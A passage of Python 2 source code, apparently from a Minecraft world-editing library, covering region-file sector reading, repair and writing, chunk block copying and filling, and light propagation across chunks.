return super(InfdevChunk, self).removeEntitiesInBox(box)
def removeTileEntitiesInBox(self, box):
self.dirty = True;
return super(InfdevChunk, self).removeTileEntitiesInBox(box)
@property
@decompress_first
def Blocks(self):
return self.root_tag[Level][Blocks].value
@property
@decompress_first
@unpack_first
def Data(self):
return self.root_tag[Level][Data].value
@property
@decompress_first
def HeightMap(self):
return self.root_tag[Level][HeightMap].value
@property
@decompress_first
@unpack_first
def SkyLight(self):
return self.root_tag[Level][SkyLight].value
@property
@decompress_first
@unpack_first
def BlockLight(self):
return self.root_tag[Level][BlockLight].value
@property
@decompress_first
def Entities(self):
return self.root_tag[Level][Entities]
@property
@decompress_first
def TileEntities(self):
return self.root_tag[Level][TileEntities]
@property
@decompress_first
def TerrainPopulated(self):
return self.root_tag[Level]["TerrainPopulated"].value;
@TerrainPopulated.setter
@decompress_first
def TerrainPopulated(self, val):
"""True or False. If False, the game will populate the chunk with
ores and vegetation on next load"""
self.root_tag[Level]["TerrainPopulated"].value = val;
class dequeset(object):
def __init__(self):
self.deque = deque();
self.set = set();
def __contains__(self, obj):
return obj in self.set;
def __len__(self):
return len(self.set);
def append(self, obj):
self.deque.append(obj);
self.set.add(obj);
def discard(self, obj):
if obj in self.set:
self.deque.remove(obj);
self.set.discard(obj);
def __getitem__(self, idx):
return self.deque[idx];
class MCRegionFile(object):
holdFileOpen = False #if False, reopens and recloses the file on each access
@property
def file(self):
openfile = lambda:file(self.path, "rb+")
if MCRegionFile.holdFileOpen:
if self._file is None:
self._file = openfile()
return notclosing(self._file)
else:
return openfile()
def close(self):
if MCRegionFile.holdFileOpen:
self._file.close()
self._file = None
def __init__(self, path, regionCoords):
self.path = path
self.regionCoords = regionCoords
self._file = None
if not os.path.exists(path):
file(path, "w").close()
with self.file as f:
filesize = os.path.getsize(path)
if filesize & 0xfff:
filesize = (filesize | 0xfff) + 1
f.truncate(filesize)
if filesize == 0:
filesize = self.SECTOR_BYTES * 2
f.truncate(filesize)
f.seek(0)
offsetsData = f.read(self.SECTOR_BYTES)
modTimesData = f.read(self.SECTOR_BYTES)
self.freeSectors = [True] * (filesize / self.SECTOR_BYTES)
self.freeSectors[0:2] = False, False
self.offsets = fromstring(offsetsData, dtype='>u4')
self.modTimes = fromstring(modTimesData, dtype='>u4')
needsRepair = False
for offset in self.offsets:
sector = offset >> 8
count = offset & 0xff
for i in xrange(sector, sector + count):
if i >= len(self.freeSectors):
#raise RegionMalformed, "Region file offset table points to sector {0} (past the end of the file)".format(i)
print "Region file offset table points to sector {0} (past the end of the file)".format(i)
needsRepair = True
break
if self.freeSectors[i] is False:
needsRepair = True
self.freeSectors[i] = False
if needsRepair:
self.repair()
info("Found region file {file} with {used}/{total} sectors used and {chunks} chunks present".format(
file=os.path.basename(path), used=self.usedSectors, total=self.sectorCount, chunks=self.chunkCount))
@property
def usedSectors(self): return len(self.freeSectors) - sum(self.freeSectors)
@property
def sectorCount(self): return len(self.freeSectors)
@property
def chunkCount(self): return sum(self.offsets > 0)
def repair(self):
lostAndFound = {}
_freeSectors = [True] * len(self.freeSectors)
_freeSectors[0] = _freeSectors[1] = False
deleted = 0
recovered = 0
info("Beginning repairs on {file} ({chunks} chunks)".format(file=os.path.basename(self.path), chunks=sum(self.offsets > 0)))
rx, rz = self.regionCoords
for index, offset in enumerate(self.offsets):
if offset:
cx = index & 0x1f
cz = index >> 5
cx += rx << 5
cz += rz << 5
sectorStart = offset >> 8
sectorCount = offset & 0xff
try:
if sectorStart + sectorCount > len(self.freeSectors):
raise RegionMalformed, "Offset {start}:{end} ({offset}) at index {index} pointed outside of the file".format(
start=sectorStart, end=sectorStart + sectorCount, index=index, offset=offset)
compressedData = self._readChunk(cx, cz)
if compressedData is None:
raise RegionMalformed, "Failed to read chunk data for {0}".format((cx, cz))
format, data = self.decompressSectors(compressedData)
chunkTag = nbt.load(buf=data)
lev = chunkTag["Level"]
xPos = lev["xPos"].value
zPos = lev["zPos"].value
overlaps = False
for i in xrange(sectorStart, sectorStart + sectorCount):
if _freeSectors[i] is False:
overlaps = True
_freeSectors[i] = False
if xPos != cx or zPos != cz or overlaps:
lostAndFound[xPos, zPos] = (format, compressedData)
if (xPos, zPos) != (cx, cz):
raise RegionMalformed, "Chunk {found} was found in the slot reserved for {expected}".format(found=(xPos, zPos), expected=(cx, cz))
else:
raise RegionMalformed, "Chunk {found} (in slot {expected}) has overlapping sectors with another chunk!".format(found=(xPos, zPos), expected=(cx, cz))
except Exception, e:
info("Unexpected chunk data at sector {sector} ({exc})".format(sector=sectorStart, exc=e))
self.setOffset(cx, cz, 0)
deleted += 1
for cPos, (format, foundData) in lostAndFound.iteritems():
cx, cz = cPos
if self.getOffset(cx, cz) == 0:
info("Found chunk {found} and its slot is empty, recovering it".format(found=cPos))
self._saveChunk(cx, cz, foundData[5:], format)
recovered += 1
info("Repair complete. Removed {0} chunks, recovered {1} chunks, net {2}".format(deleted, recovered, recovered - deleted))
def extractAllChunks(self, folder):
if not os.path.exists(folder):
os.mkdir(folder)
for cx, cz in itertools.product(range(32), range(32)):
sectors = self._readChunk(cx, cz)
if sectors is not None:
format, compressedData = self.unpackSectors(sectors)
data = self._decompressSectors(format, compressedData)
chunkTag = nbt.load(buf=data)
lev = chunkTag["Level"]
xPos = lev["xPos"].value
zPos = lev["zPos"].value
gzdata = InfdevChunk.compressTagGzip(chunkTag)
#print chunkTag.pretty_string()
with file(os.path.join(folder, "c.{0}.{1}.dat".format(base36(xPos), base36(zPos))), "wb") as f:
f.write(gzdata)
def _readChunk(self, cx, cz):
cx &= 0x1f
cz &= 0x1f
offset = self.getOffset(cx, cz)
if offset == 0: return None
sectorStart = offset >> 8
numSectors = offset & 0xff
if numSectors == 0: return None
if sectorStart + numSectors > len(self.freeSectors):
return None
with self.file as f:
f.seek(sectorStart * self.SECTOR_BYTES)
data = f.read(numSectors * self.SECTOR_BYTES)
assert(len(data) > 0)
#debug("REGION LOAD {0},{1} sector {2}".format(cx, cz, sectorStart))
return data
def loadChunk(self, chunk):
cx, cz = chunk.chunkPosition
data = self._readChunk(cx, cz)
if data is None: raise ChunkNotPresent, (cx, cz, self)
chunk.compressedTag = data[5:]
format, data = self.decompressSectors(data)
chunk.root_tag = nbt.load(buf=data)
chunk.compressMode = format
def unpackSectors(self, data):
length = struct.unpack_from(">I", data)[0]
format = struct.unpack_from("B", data, 4)[0]
data = data[5:length + 5]
return (format, data)
def _decompressSectors(self, format, data):
if format == self.VERSION_GZIP:
return gunzip(data)
if format == self.VERSION_DEFLATE:
return inflate(data)
raise IOError, "Unknown compress format: {0}".format(format)
def decompressSectors(self, data):
format, data = self.unpackSectors(data)
return format, self._decompressSectors(format, data)
def saveChunk(self, chunk):
cx, cz = chunk.chunkPosition
data = chunk.compressedTag
format = chunk.compressMode
self._saveChunk(cx, cz, data, format)
def _saveChunk(self, cx, cz, data, format):
cx &= 0x1f
cz &= 0x1f
offset = self.getOffset(cx, cz)
sectorNumber = offset >> 8
sectorsAllocated = offset & 0xff
sectorsNeeded = (len(data) + self.CHUNK_HEADER_SIZE) / self.SECTOR_BYTES + 1;
if sectorsNeeded >= 256: return
if (sectorNumber != 0 and sectorsAllocated >= sectorsNeeded):
debug("REGION SAVE {0},{1} rewriting {2}b".format(cx, cz, len(data)))
self.writeSector(sectorNumber, data, format)
else:
# we need to allocate new sectors
# mark the sectors previously used for this chunk as free
for i in xrange(sectorNumber, sectorNumber + sectorsAllocated):
self.freeSectors[i] = True
runLength = 0
try:
runStart = self.freeSectors.index(True)
for i in range(runStart, len(self.freeSectors)):
if runLength:
if self.freeSectors[i]:
runLength += 1
else:
runLength = 0
elif self.freeSectors[i]:
runStart = i
runLength = 1
if runLength >= sectorsNeeded:
break
except ValueError:
pass
# we found a free space large enough
if runLength >= sectorsNeeded:
debug("REGION SAVE {0},{1}, reusing {2}b".format(cx, cz, len(data)))
sectorNumber = runStart
self.setOffset(cx, cz, sectorNumber << 8 | sectorsNeeded)
self.writeSector(sectorNumber, data, format)
self.freeSectors[sectorNumber:sectorNumber + sectorsNeeded] = [False] * sectorsNeeded
else:
# no free space large enough found -- we need to grow the
# file
debug("REGION SAVE {0},{1}, growing by {2}b".format(cx, cz, len(data)))
with self.file as f:
f.seek(0, 2)
filesize = f.tell()
sectorNumber = len(self.freeSectors)
assert sectorNumber * self.SECTOR_BYTES == filesize
filesize += sectorsNeeded * self.SECTOR_BYTES
f.truncate(filesize)
self.freeSectors += [False] * sectorsNeeded
self.setOffset(cx, cz, sectorNumber << 8 | sectorsNeeded)
self.writeSector(sectorNumber, data, format)
def writeSector(self, sectorNumber, data, format):
with self.file as f:
debug("REGION: Writing sector {0}".format(sectorNumber))
f.seek(sectorNumber * self.SECTOR_BYTES)
f.write(struct.pack(">I", len(data) + 1));# // chunk length
f.write(struct.pack("B", format));# // chunk version number
f.write(data);# // chunk data
#f.flush()
def containsChunk(self, cx,cz):
return self.getOffset(cx,cz) != 0
def getOffset(self, cx, cz):
cx &= 0x1f;
cz &= 0x1f
return self.offsets[cx + cz * 32]
def setOffset(self, cx, cz, offset):
cx &= 0x1f;
cz &= 0x1f
self.offsets[cx + cz * 32] = offset
with self.file as f:
f.seek(0)
f.write(self.offsets.tostring())
SECTOR_BYTES = 4096
SECTOR_INTS = SECTOR_BYTES / 4
CHUNK_HEADER_SIZE = 5;
VERSION_GZIP = 1
VERSION_DEFLATE = 2
compressMode = VERSION_DEFLATE
base36alphabet = "0123456789abcdefghijklmnopqrstuvwxyz"
def decbase36(s):
return int(s, 36)
def base36(n):
global base36alphabet
n = int(n);
if 0 == n: return '0'
neg = "";
if n < 0:
neg = "-"
n = -n;
work = []
while(n):
n, digit = divmod(n, 36)
work.append(base36alphabet[digit])
return neg + ''.join(reversed(work))
def deflate(data):
#zobj = zlib.compressobj(6,zlib.DEFLATED,-zlib.MAX_WBITS,zlib.DEF_MEM_LEVEL,0)
#zdata = zobj.compress(data)
#zdata += zobj.flush()
#return zdata
return zlib.compress(data)
def inflate(data):
return zlib.decompress(data)
class ChunkedLevelMixin(object):
def blockLightAt(self, x, y, z):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
ch = self.getChunk(xc, zc)
return ch.BlockLight[xInChunk, zInChunk, y]
def setBlockLightAt(self, x, y, z, newLight):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
ch = self.getChunk(xc, zc)
ch.BlockLight[xInChunk, zInChunk, y] = newLight
ch.chunkChanged(False)
def blockDataAt(self, x, y, z):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
try:
ch = self.getChunk(xc, zc)
except ChunkNotPresent:
return 0
return ch.Data[xInChunk, zInChunk, y]
def setBlockDataAt(self, x, y, z, newdata):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
try:
ch = self.getChunk(xc, zc)
except ChunkNotPresent:
return 0
ch.Data[xInChunk, zInChunk, y] = newdata
ch.dirty = True
ch.needsLighting = True
def blockAt(self, x, y, z):
"""returns 0 for blocks outside the loadable chunks. automatically loads chunks."""
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
try:
ch = self.getChunk(xc, zc)
except ChunkNotPresent:
return 0
return ch.Blocks[xInChunk, zInChunk, y]
def setBlockAt(self, x, y, z, blockID):
"""returns 0 for blocks outside the loadable chunks. automatically loads chunks."""
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
try:
ch = self.getChunk(xc, zc)
except ChunkNotPresent:
return 0
ch.Blocks[xInChunk, zInChunk, y] = blockID
ch.dirty = True
ch.needsLighting = True
def skylightAt(self, x, y, z):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf
ch = self.getChunk(xc, zc)
return ch.SkyLight[xInChunk, zInChunk, y]
def setSkylightAt(self, x, y, z, lightValue):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
ch = self.getChunk(xc, zc)
skyLight = ch.SkyLight
oldValue = skyLight[xInChunk, zInChunk, y]
ch.chunkChanged(False)
if oldValue < lightValue:
skyLight[xInChunk, zInChunk, y] = lightValue
return oldValue < lightValue
def sourceMaskFunc(self, blocksToCopy):
if blocksToCopy is not None:
typemask = zeros((256) , dtype='bool')
typemask[blocksToCopy] = 1;
def sourceMask(sourceBlocks):
return typemask[sourceBlocks]
else:
def sourceMask(_sourceBlocks):
return slice(None, None)
return sourceMask
def copyBlocksFromFiniteIter(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy, create = False):
#assumes destination point and bounds have already been checked.
(sx, sy, sz) = sourceBox.origin
start = datetime.now();
sourceMask = self.sourceMaskFunc(blocksToCopy)
destBox = BoundingBox(destinationPoint, sourceBox.size)
i = 0;
chunkCount = float(destBox.chunkCount)
for (cPos, slices, point) in self._getSlices(destBox):
if not self.containsChunk(*cPos):
if create:
self.createChunk(*cPos)
else:
continue
chunk = self.getChunk(*cPos)
i += 1;
yield (i, chunkCount)
if i % 100 == 0:
info("Chunk {0}...".format(i))
blocks = chunk.Blocks[slices];
localSourceCorner2 = (
sx + point[0] + blocks.shape[0],
sy + blocks.shape[2],
sz + point[2] + blocks.shape[1],
)
sourceBlocks = sourceLevel.Blocks[sx + point[0]:localSourceCorner2[0],
sz + point[2]:localSourceCorner2[2],
sy:localSourceCorner2[1]]
#sourceBlocks = filterTable[sourceBlocks]
mask = sourceMask(sourceBlocks)
#for small level slices, reduce the destination area
x, z, y = sourceBlocks.shape
blocks = blocks[0:x, 0:z, 0:y]
sourceData = None
if hasattr(sourceLevel, 'Data'):
#indev or schematic
sourceData = sourceLevel.Data[sx + point[0]:localSourceCorner2[0],
sz + point[2]:localSourceCorner2[2],
sy:localSourceCorner2[1]]
data = chunk.Data[slices][0:x, 0:z, 0:y]
convertedSourceBlocks, convertedSourceData = self.convertBlocksFromLevel(sourceLevel, sourceBlocks, sourceData)
blocks[mask] = convertedSourceBlocks[mask]
if convertedSourceData is not None:
data[mask] = (convertedSourceData[:, :, :])[mask]
data[mask] &= 0xf;
chunk.chunkChanged();
d = datetime.now() - start;
if i:
info("Finished {2} chunks in {0} ({1} per chunk)".format(d, d / i, i))
#chunk.compress(); #xxx find out why this trashes changes to tile entities
def copyBlocksFromInfiniteIter(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy, create = False):
""" copy blocks between two infinite levels by looping through the
destination's chunks. make a sub-box of the source level for each chunk
and copy block and entities in the sub box to the dest chunk."""
#assumes destination point and bounds have already been checked.
destBox = BoundingBox(destinationPoint, sourceBox.size)
chunkCount = destBox.chunkCount
i = 0
sourceMask = self.sourceMaskFunc(blocksToCopy)
def subbox(slices, point):
size = [s.stop - s.start for s in slices]
size[1], size[2] = size[2], size[1]
return BoundingBox([p + a for p, a in zip(point, sourceBox.origin)], size)
def shouldCreateFunc(slices, point):
box = subbox(slices, point)
b = any(list(sourceLevel.containsChunk(*c) for c in box.chunkPositions)) #any() won't take a generator-expression :(
#if b == False:
# print 'Skipped ', list(box.chunkPositions)
return b
for cPos, slices, point in self._getSlices(destBox):
if not self.containsChunk(*cPos):
if shouldCreateFunc(slices, point):
self.createChunk(*cPos)
else:
continue
chunk = self.getChunk(*cPos)
i += 1
yield (i, chunkCount)
if i % 100 == 0:
info("Chunk {0}...".format(i))
dstblocks = chunk.Blocks[slices]
dstdata = chunk.Data[slices]
sourceSubBox = subbox(slices, point)
for srcchunk, srcslices, srcpoint in sourceLevel.getChunkSlices(sourceSubBox):
srcpoint = srcpoint[0], srcpoint[2], srcpoint[1]
sourceBlocks = srcchunk.Blocks[srcslices]
sourceData = srcchunk.Data[srcslices]
mask = sourceMask(sourceBlocks)
convertedSourceBlocks, convertedSourceData = self.convertBlocksFromLevel(sourceLevel, sourceBlocks, sourceData)
dstslices = [slice(p, p + (s.stop - s.start)) for p, s in zip(srcpoint, srcslices)]
dstblocks[dstslices][mask] = convertedSourceBlocks[mask]
if convertedSourceData is not None:
dstdata[dstslices][mask] = convertedSourceData[mask]
chunk.chunkChanged()
def copyBlocksFrom(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy=None, entities=True, create=False):
return exhaust(self.copyBlocksFromIter(sourceLevel, sourceBox, destinationPoint, blocksToCopy, entities, create))
def copyBlocksFromIter(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy=None, entities=True, create=False):
(x, y, z) = destinationPoint;
(lx, ly, lz) = sourceBox.size
#sourcePoint, sourcePoint1 = sourceBox
sourceBox, destinationPoint = self.adjustCopyParameters(sourceLevel, sourceBox, destinationPoint)
#needs work xxx
info(u"Copying {0} blocks from {1} to {2}" .format (ly * lz * lx, sourceBox, destinationPoint))
startTime = datetime.now()
if not sourceLevel.isInfinite:
for i in self.copyBlocksFromFiniteIter(sourceLevel, sourceBox, destinationPoint, blocksToCopy, create):
yield i
else:
for i in self.copyBlocksFromInfiniteIter(sourceLevel, sourceBox, destinationPoint, blocksToCopy, create):
yield i
for i in self.copyEntitiesFromIter(sourceLevel, sourceBox, destinationPoint, entities):
yield i
info("Duration: {0}".format(datetime.now() - startTime))
#self.saveInPlace()
def fillBlocks(self, box, blockInfo, blocksToReplace=[]):
return exhaust(self.fillBlocksIter(box, blockInfo, blocksToReplace))
def fillBlocksIter(self, box, blockInfo, blocksToReplace=[]):
if box is None:
chunkIterator = self.getAllChunkSlices()
box = self.bounds
else:
chunkIterator = self.getChunkSlices(box)
#shouldRetainData = (not blockInfo.hasVariants and not any([b.hasVariants for b in blocksToReplace]))
#if shouldRetainData:
# info( "Preserving data bytes" )
shouldRetainData = False #xxx old behavior overwrote blockdata with 0 when e.g. replacing water with lava
info("Replacing {0} with {1}".format(blocksToReplace, blockInfo))
changesLighting = True
if len(blocksToReplace):
blocktable = self.blockReplaceTable(blocksToReplace)
shouldRetainData = all([blockrotation.SameRotationType(blockInfo, b) for b in blocksToReplace])
newAbsorption = self.materials.lightAbsorption[blockInfo.ID]
oldAbsorptions = [self.materials.lightAbsorption[b.ID] for b in blocksToReplace]
changesLighting = False
for a in oldAbsorptions:
if a != newAbsorption: changesLighting = True;
newEmission = self.materials.lightEmission[blockInfo.ID]
oldEmissions = [self.materials.lightEmission[b.ID] for b in blocksToReplace]
for a in oldEmissions:
if a != newEmission: changesLighting = True;
i = 0;
skipped = 0
replaced = 0;
for (chunk, slices, point) in chunkIterator:
i += 1;
if i % 100 == 0:
info(u"Chunk {0}...".format(i))
yield i, box.chunkCount
blocks = chunk.Blocks[slices]
data = chunk.Data[slices]
mask = slice(None)
needsLighting = changesLighting;
if len(blocksToReplace):
mask = blocktable[blocks, data]
blockCount = mask.sum()
replaced += blockCount;
#don't waste time relighting and copying if the mask is empty
if blockCount:
blocks[:][mask] = blockInfo.ID
if not shouldRetainData:
data[mask] = blockInfo.blockData
else:
skipped += 1;
needsLighting = False;
def include(tileEntity):
p = TileEntity.pos(tileEntity)
x, y, z = map(lambda a, b, c:(a - b) - c, p, point, box.origin)
return not ((p in box) and mask[x, z, y])
chunk.TileEntities.value[:] = filter(include, chunk.TileEntities)
else:
blocks[:] = blockInfo.ID
if not shouldRetainData:
data[:] = blockInfo.blockData
chunk.removeTileEntitiesInBox(box)
chunk.chunkChanged(needsLighting);
if len(blocksToReplace):
info(u"Replace: Skipped {0} chunks, replaced {1} blocks".format(skipped, replaced))
def generateLights(self, dirtyChunks=None):
return exhaust(self.generateLightsIter(dirtyChunks))
def _getChunkUnloaded(self, cx, cz):
return self.getChunk(cx,cz)
def generateLightsIter(self, dirtyChunks=None):
""" dirtyChunks may be an iterable yielding (xPos,zPos) tuples
if none, generate lights for all chunks that need lighting
"""
startTime = datetime.now();
if dirtyChunks is None:
dirtyChunks = (ch for ch in self._loadedChunks.itervalues() if ch.needsLighting)
else:
dirtyChunks = (self._getChunkUnloaded(*c) for c in dirtyChunks if self.containsChunk(*c))
dirtyChunks = sorted(dirtyChunks, key=lambda x:x.chunkPosition)
#at 150k per loaded chunk,
maxLightingChunks = 4000
info(u"Asked to light {0} chunks".format(len(dirtyChunks)))
chunkLists = [dirtyChunks];
def reverseChunkPosition(x):
cx, cz = x.chunkPosition;
return cz, cx
def splitChunkLists(chunkLists):
newChunkLists = []
for l in chunkLists:
#list is already sorted on x position, so this splits into left and right
smallX = l[:len(l) / 2]
bigX = l[len(l) / 2:]
#sort halves on z position
smallX = sorted(smallX, key=reverseChunkPosition)
bigX = sorted(bigX, key=reverseChunkPosition)
#add quarters to list
newChunkLists.append(smallX[:len(smallX) / 2])
newChunkLists.append(smallX[len(smallX) / 2:])
newChunkLists.append(bigX[:len(bigX) / 2])
newChunkLists.append(bigX[len(bigX) / 2:])
return newChunkLists
while len(chunkLists[0]) > maxLightingChunks:
chunkLists = splitChunkLists(chunkLists);
if len(chunkLists) > 1:
info(u"Using {0} batches to conserve memory.".format(len(chunkLists)))
#batchSize = min(len(a) for a in chunkLists)
estimatedTotals = [len(a) * 32 for a in chunkLists]
workDone = 0
for i, dc in enumerate(chunkLists):
info(u"Batch {0}/{1}".format(i, len(chunkLists)))
dc = sorted(dc, key=lambda x:x.chunkPosition)
workTotal = sum(estimatedTotals)
t = 0
for c,t,p in self._generateLightsIter(dc):
yield c+workDone,t + workTotal - estimatedTotals[i], p
estimatedTotals[i] = t
workDone += t
for ch in dc:
ch.compress();
timeDelta = datetime.now() - startTime;
if len(dirtyChunks):
info(u"Completed in {0}, {1} per chunk".format(timeDelta, dirtyChunks and timeDelta / len(dirtyChunks) or 0))
return;
def _generateLightsIter(self, dirtyChunks):
conserveMemory = False
la = array(self.materials.lightAbsorption)
clip(la, 1, 15, la)
dirtyChunks = set(dirtyChunks)
workDone = 0
workTotal = len(dirtyChunks) * 29
progressInfo = (u"Lighting {0} chunks".format(len(dirtyChunks)))
info(progressInfo)
for i, chunk in enumerate(dirtyChunks):
try:
chunk.load();
except (ChunkNotPresent, ChunkMalformed):
continue;
chunk.chunkChanged();
yield i, workTotal, progressInfo
assert chunk.dirty and chunk.needsLighting
workDone += len(dirtyChunks)
workTotal = len(dirtyChunks)
for ch in list(dirtyChunks):
#relight all blocks in neighboring chunks in case their light source disappeared.
cx, cz = ch.chunkPosition
for dx, dz in itertools.product((-1, 0, 1), (-1, 0, 1)):
try:
ch = self.getChunk (cx + dx, cz + dz)
except (ChunkNotPresent, ChunkMalformed):
continue
dirtyChunks.add(ch);
dirtyChunks = sorted(dirtyChunks, key=lambda x:x.chunkPosition)
workTotal += len(dirtyChunks) * 28
for i, chunk in enumerate(dirtyChunks):
chunk.BlockLight[:] = self.materials.lightEmission[chunk.Blocks];
chunk.dirty = True
if conserveMemory:
chunk.compress();
zeroChunk = ZeroChunk(self.Height)
zeroChunk.BlockLight[:] = 0;
zeroChunk.SkyLight[:] = 0;
startingDirtyChunks = dirtyChunks
oldLeftEdge = zeros((1, 16, self.Height), 'uint8');
oldBottomEdge = zeros((16, 1, self.Height), 'uint8');
oldChunk = zeros((16, 16, self.Height), 'uint8');
if self.dimNo in (-1, 1):
lights = ("BlockLight",)
else:
lights = ("BlockLight", "SkyLight")
info(u"Dispersing light...")
def clipLight(light):
#light arrays are all uint8 by default, so when results go negative
#they become large instead. reinterpret as signed int using view()
#and then clip to range
light.view('int8').clip(0, 15, light)
for j, light in enumerate(lights):
zerochunkLight = getattr(zeroChunk, light);
newDirtyChunks = list(startingDirtyChunks);
work = 0
for i in range(14):
if len(newDirtyChunks) == 0:
workTotal -= len(startingDirtyChunks) * (14 - i)
break
progressInfo = u"{0} Pass {1}: {2} chunks".format(light, i, len(newDirtyChunks))
info(progressInfo)
"""
propagate light!
for each of the six cardinal directions, figure a new light value for
adjoining blocks by reducing this chunk's light by light absorption and fall off.
compare this new light value against the old light value and update with the maximum.
we calculate all chunks one step before moving to the next step, to ensure all gaps at chunk edges are filled.
we do an extra cycle because lights sent across edges may lag by one cycle.
xxx this can be optimized by finding the highest and lowest blocks
that changed after one pass, and only calculating changes for that
vertical slice on the next pass. newDirtyChunks would have to be a
list of (cPos, miny, maxy) tuples or a cPos : (miny, maxy) dict
"""
newDirtyChunks = set(newDirtyChunks)
newDirtyChunks.discard(zeroChunk)
dirtyChunks = sorted(newDirtyChunks, key=lambda x:x.chunkPosition)
newDirtyChunks = list();
for chunk in dirtyChunks:
(cx, cz) = chunk.chunkPosition
neighboringChunks = {};
try:
chunk.load();
except (ChunkNotPresent, ChunkMalformed), e:
print "Chunk error during relight, chunk skipped: ", e
continue;
for dir, dx, dz in ((FaceXDecreasing, -1, 0),
(FaceXIncreasing, 1, 0),
(FaceZDecreasing, 0, -1),
(FaceZIncreasing, 0, 1)):
try:
neighboringChunks[dir] = self.getChunk(cx + dx, cz + dz)
except (ChunkNotPresent, ChunkMalformed):
neighboringChunks[dir] = zeroChunk;
chunkLa = la[chunk.Blocks];
chunkLight = getattr(chunk, light);
oldChunk[:] = chunkLight[:]
### Spread light toward -X
nc = neighboringChunks[FaceXDecreasing]
ncLight = getattr(nc, light);
oldLeftEdge[:] = ncLight[15:16, :, 0:self.Height] #save the old left edge
#left edge
newlight = (chunkLight[0:1, :, :self.Height] - la[nc.Blocks[15:16, :, 0:self.Height]])
clipLight(newlight)
maximum(ncLight[15:16, :, 0:self.Height], newlight, ncLight[15:16, :, 0:self.Height])
#chunk body
newlight = (chunkLight[1:16, :, 0:self.Height] - chunkLa[0:15, :, 0:self.Height])
clipLight(newlight)
maximum(chunkLight[0:15, :, 0:self.Height], newlight, chunkLight[0:15, :, 0:self.Height])
#right edge
nc = neighboringChunks[FaceXIncreasing]
ncLight = getattr(nc, light);
newlight = ncLight[0:1, :, :self.Height] - chunkLa[15:16, :, 0:self.Height]
clipLight(newlight)
maximum(chunkLight[15:16, :, 0:self.Height], newlight, chunkLight[15:16, :, 0:self.Height])
### Spread light toward +X
#right edge
nc = neighboringChunks[FaceXIncreasing]
ncLight = getattr(nc, light);
newlight = (chunkLight[15:16, :, 0:self.Height] - la[nc.Blocks[0:1, :, 0:self.Height]])
clipLight(newlight)
maximum(ncLight[0:1, :, 0:self.Height], newlight, ncLight[0:1, :, 0:self.Height])
#chunk body
newlight = (chunkLight[0:15, :, 0:self.Height] - chunkLa[1:16, :, 0:self.Height])
clipLight(newlight)
maximum(chunkLight[1:16, :, 0:self.Height], newlight, chunkLight[1:16, :, 0:self.Height])
#left edge
nc = neighboringChunks[FaceXDecreasing]
ncLight = getattr(nc, light);
newlight = ncLight[15:16, :, :self.Height] - chunkLa[0:1, :, 0:self.Height]
clipLight(newlight)
maximum(chunkLight[0:1, :, 0:self.Height], newlight, chunkLight[0:1, :, 0:self.Height])
zerochunkLight[:] = 0; #zero the zero chunk after each direction
# so the lights it absorbed don't affect the next pass
#check if the left edge changed and dirty or compress the chunk appropriately
if (oldLeftEdge != ncLight[15:16, :, :self.Height]).any():
#chunk is dirty
newDirtyChunks.append(nc)
### Spread light toward -Z
#bottom edge
nc = neighboringChunks[FaceZDecreasing]
ncLight = getattr(nc, light);
oldBottomEdge[:] = ncLight[:, 15:16, :self.Height] # save the old bottom edge
newlight = (chunkLight[:, 0:1, :self.Height] - la[nc.Blocks[:, 15:16, :self.Height]])
clipLight(newlight)
maximum(ncLight[:, 15:16, :self.Height], newlight, ncLight[:, 15:16, :self.Height])
#chunk body
newlight = (chunkLight[:, 1:16, :self.Height] - chunkLa[:, 0:15, :self.Height])
clipLight(newlight)
maximum(chunkLight[:, 0:15, :self.Height], newlight, chunkLight[:, 0:15, :self.Height])
#top edge
nc = neighboringChunks[FaceZIncreasing]
ncLight = getattr(nc, light);
newlight = ncLight[:, 0:1, :self.Height] - chunkLa[:, 15:16, 0:self.Height]
clipLight(newlight)
maximum(chunkLight[:, 15:16, 0:self.Height], newlight, chunkLight[:, 15:16, 0:self.Height])
### Spread light toward +Z
#top edge
nc = neighboringChunks[FaceZIncreasing]
ncLight = getattr(nc, light);
newlight = (chunkLight[:, 15:16, :self.Height] - la[nc.Blocks[:, 0:1, :self.Height]])
clipLight(newlight)
maximum(ncLight[:, 0:1, :self.Height], newlight, ncLight[:, 0:1, :self.Height])
#chunk body
newlight = (chunkLight[:, 0:15, :self.Height] - chunkLa[:, 1:16, :self.Height])
clipLight(newlight)
maximum(chunkLight[:, 1:16, :self.Height], newlight, chunkLight[:, 1:16, :self.Height])
#bottom edge
nc = neighboringChunks[FaceZDecreasing]
ncLight = getattr(nc, light);
newlight = ncLight[:, 15:16, :self.Height] - chunkLa[:, 0:1, 0:self.Height]
clipLight(newlight)
maximum(chunkLight[:, 0:1, 0:self.Height], newlight, chunkLight[:, 0:1, 0:self.Height])
zerochunkLight[:] = 0;
if (oldBottomEdge != ncLight[:, 15:16, :self.Height]).any():
newDirtyChunks.append(nc)
newlight = (chunkLight[:, :, 0:self.Height - 1] - chunkLa[:, :, 1:self.Height])
clipLight(newlight)
maximum(chunkLight[:, :, 1:self.Height], newlight, chunkLight[:, :, 1:self.Height])
newlight = (chunkLight[:, :, 1:self.Height] - chunkLa[:, :, 0:self.Height - 1])
clipLight(newlight)
maximum(chunkLight[:, :, 0:self.Height - 1], newlight, chunkLight[:, :, 0:self.Height - 1])
if (oldChunk != chunkLight).any():
newDirtyChunks.append(chunk);
work += 1
yield workDone + work, workTotal, progressInfo
workDone += work
workTotal -= len(startingDirtyChunks)
workTotal += work
work = 0
